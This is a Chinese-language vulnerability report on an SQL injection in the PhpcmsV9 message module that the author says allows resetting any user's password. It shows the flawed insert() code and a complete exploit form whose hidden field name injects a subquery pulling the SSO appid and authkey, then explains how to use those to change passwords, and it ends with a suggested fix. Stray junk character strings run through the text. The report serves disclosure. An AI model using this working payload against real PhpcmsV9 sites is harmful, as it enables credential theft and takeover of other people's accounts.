PhpcmsV9 SQL注射修改任意用户密码漏洞

admin

简要描述：

' q8 [" }. w- M$ m# u# _第二发如约来到，感谢大家的关注，在第二发中使用了一个无限制的SQL注射，最终目的可以修改任意用户密码，建议确认安全危害等级为高。
& A3 N" N- y; V- O
明天再更新下一个漏洞。
* D5 M+ m" S1 e/ \8 A详细说明：
在/phpcms9/phpcms/modules/message/index.php中有代码如下：

# E0 P7 q8 o, ~* e! Z$ n$messageid = $this->message_db->insert($_POST['info'],true);
4 t, E; [7 t  b$ m4 \
& x/ I  d; s/ F3 s5 p( u& y
insert方法是key value的，代码如下：
+ e6 s/ g: Z. r: ^' x
& k$ t9 m8 U- r# cpublic function insert($data, $table, $return_insert_id = false, $replace = false) {
# @! I/ q9 C- t1 ]& p. n; T                if(!is_array( $data ) || $table == '' || count($data) == 0) {
/ B% u5 U1 X; @) _3 u& U                        return false;
                }
               
2 T  U& q* U, R# w4 T- Y& }3 Q' r/ P                $fielddata = array_keys($data);
                $valuedata = array_values($data);
                array_walk($fielddata, array($this, 'add_special_char'));
                array_walk($valuedata, array($this, 'escape_string'));
+ e2 ?5 O0 U" P1 s+ }               
                $field = implode (',', $fielddata);
                $value = implode (',', $valuedata);

+ m) i" N9 i# u' D6 E: T& C                $cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';
, K9 c, q5 n- G0 S. h# E                $sql = $cmd.' `'.$this->config['database'].'`.`'.$table.'`('.$field.') VALUES ('.$value.')';
                $return = $this->execute($sql);
- w% F3 V: Z5 D4 k* ~                return $return_insert_id ? $this->insert_id() : $return;
        }

/ c' Y) k: v0 l# O2 }! i' v# [
7 h7 ?/ Z6 k& i2 x嗯，很遗憾的是
) ?% V+ A& z# \) e! j  u: _9 Y2 b
; w2 c6 @+ ]$ M( u0 Carray_walk($fielddata, array($this, 'add_special_char'));


中并没有对key做任何的过滤，所以，第一段提到的代码导致了一个SQL注射漏洞 ：（。
' ?  ]: Q; _. q1 y: q8 d9 |
' f" N5 B. v; S- H1 V到此，为了poc一下，我读取了我本地的authkey，接下来我已经可以重置任意用户密码了，后面的事情我就没有演示了。

漏洞证明：
9 K9 c% Q+ K1 m) U' y3 L读出了phpsso_server的appid和authkey，然后可以调用client.class.php中的ps_member_edit函数修改任意用户密码。

) P: B0 F6 R7 `+ Q6 c
表单如下：用户名什么的得自己改一改。
' u7 q5 e) ^6 ?<form name="myform" action="http://localhost/phpcms9/index.php?m=message&c=index&a=reply" method="post" id="myform">
<table width="100%" cellspacing="0" class="table_form">
: Z- K' J7 o! [; A/ \1 b' N+ C* v. Y<tr>
<th>标 题：</th>
<td><input name="info[subject]" type="text" id="subject" size="30" value="Re: hh"  class="input-text"/></td>
: T4 F8 D  z+ n3 c! X* K</tr>
<tr>
<th>内 容：</th>
<td><textarea name="info[content]"  id="con" rows="5" cols="50"></textarea></td>
0 \7 I4 L; D* y: C! s. e</tr>
<input type="hidden" name="info[replyid]" value="2" />
<input type="hidden" name="info[send_to_id]" value="cc" />
) m% |( k% f8 s, Y( L/ J7 V* U<input type="hidden" name="info[send_from_id]" value="hh">
<!-- 漏洞的利用重点在这里开始 -->
<input type="hidden" name="info[`status`) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104, 104),1)#]" value="cc" />
4 O! ?5 r3 M9 ?& v, H<!-- 漏洞的利用重点在这里结束 -->
<tr>
5 [& A5 ~1 }$ U  z1 V3 J2 O<th>验证码：</th>
<td><input name="code" type="text" id="code" size="10"  class="input-text"/> <img id='code_img' onclick='this.src=this.src+"&"+Math.random()' src='http://localhost/phpcms9/api.php?op=checkcode&code_len=4&font_size=14&width=110&height=30&font_color=&background='></td>
</tr>
/ o9 L/ Q1 ]( k/ g# R8 ^" e( z<tr>
$ y& R* N% M2 r: ~) h2 t<td></td>
/ r7 p2 f" a3 `( }: l- R<td colspan="2"><label>
<input type="submit" name="dosubmit" id="dosubmit" value="确 定" class="button"/>
# o, y1 V+ o. @% {/ Z7 V# F</label></td>
4 A$ b: |; P- V/ D- t</tr>
( _' C" ^- @8 l9 t6 h  ]! W) v</table>
" P1 h" ~7 n4 R% y& V8 ^7 m</form>
在add_special_char函数内对key做过滤就可以了。